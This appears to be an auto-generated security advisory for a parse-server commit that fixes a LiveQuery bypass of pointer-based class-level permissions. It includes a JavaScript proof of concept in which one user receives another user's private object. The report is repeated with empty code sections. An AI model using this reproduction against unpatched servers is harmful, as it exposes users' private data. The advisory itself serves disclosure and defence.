Potential Security Vulnerability Detected
Repository: parse-community/parse-server
Commit: 6c3317a
Author: Manuel
Date: 2026-03-20T02:17:14Z
Commit Message
fix: LiveQuery bypasses CLP pointer permission enforcement ([GHSA-fph2-r4qg-9576](https://github.com/parse-community/parse-server/security/advisories/GHSA-fph2-r4qg-9576)) (#10250)
Pull Request
PR: #10250 - fix: LiveQuery bypasses CLP pointer permission enforcement (GHSA-fph2-r4qg-9576)
Labels: state:released-alpha
Description:
Issue
LiveQuery bypasses CLP pointer permission enforcement ([GHSA-fph2-r4qg-9576](GHSA-fph2-r4qg-9576))
Tasks
Analysis
Vulnerability Type: Authorization Bypass
Severity: High
Description
Before the patch, the LiveQuery server did not properly enforce Class-Level Permissions (CLP) pointer-based user field restrictions, allowing unauthorized users to receive live query updates for objects they should not have access to. This patch adds explicit enforcement of pointer permissions (readUserFields/writeUserFields) in LiveQuery events, ensuring only authorized users receive notifications based on pointer ownership. This prevents unauthorized data leakage through LiveQuery subscriptions.
Affected Code
await this._matchesCLP(
classLevelPermissions,
message.currentParseObject,
client,
requestId,
op
);
Proof of Concept
1. Configure a class 'PrivateMessage' with CLP: { readUserFields: ['owner'] }.
2. Create userA and userB.
3. UserB subscribes to LiveQuery on 'PrivateMessage'.
4. UserA creates a 'PrivateMessage' object with 'owner' pointer set to userA.
Expected Exploit Behavior Before Patch:
- UserB receives LiveQuery 'create' events for objects owned by userA despite no permission.
Commands:
```javascript
const userA = new Parse.User();
userA.setUsername('userA');
userA.setPassword('pass');
await userA.signUp();
const userB = new Parse.User();
userB.setUsername('userB');
userB.setPassword('pass');
await userB.signUp();
const query = new Parse.Query('PrivateMessage');
const subscription = await query.subscribe(userB.getSessionToken());
subscription.on('create', obj => { console.log('Unauthorized live event:', obj); });
const msg = new Parse.Object('PrivateMessage');
msg.set('owner', userA);
msg.set('content', 'secret');
await msg.save(null, { useMasterKey: true });
```
Before the patch, userB would get notified about the creation of the message owned by userA, leaking data.
After patch, such events are not sent to unauthorized users.
This issue was automatically created by Vulnerability Spoiler Alert.
Detected at: 2026-03-20T06:00:41.147Z
Potential Security Vulnerability Detected
Repository: parse-community/parse-server
Commit: 6c3317a
Author: Manuel
Date: 2026-03-20T02:17:14Z
Commit Message
Pull Request
PR: #10250 - fix: LiveQuery bypasses CLP pointer permission enforcement (GHSA-fph2-r4qg-9576)
Labels: state:released-alpha
Description:
Issue
LiveQuery bypasses CLP pointer permission enforcement ([GHSA-fph2-r4qg-9576](GHSA-fph2-r4qg-9576))
Tasks
Analysis
Vulnerability Type: Authorization Bypass
Severity: High
Description
Before the patch, the LiveQuery server did not properly enforce Class-Level Permissions (CLP) pointer-based user field restrictions, allowing unauthorized users to receive live query updates for objects they should not have access to. This patch adds explicit enforcement of pointer permissions (readUserFields/writeUserFields) in LiveQuery events, ensuring only authorized users receive notifications based on pointer ownership. This prevents unauthorized data leakage through LiveQuery subscriptions.
Affected Code
Proof of Concept
This issue was automatically created by Vulnerability Spoiler Alert.
Detected at: 2026-03-20T06:00:41.147Z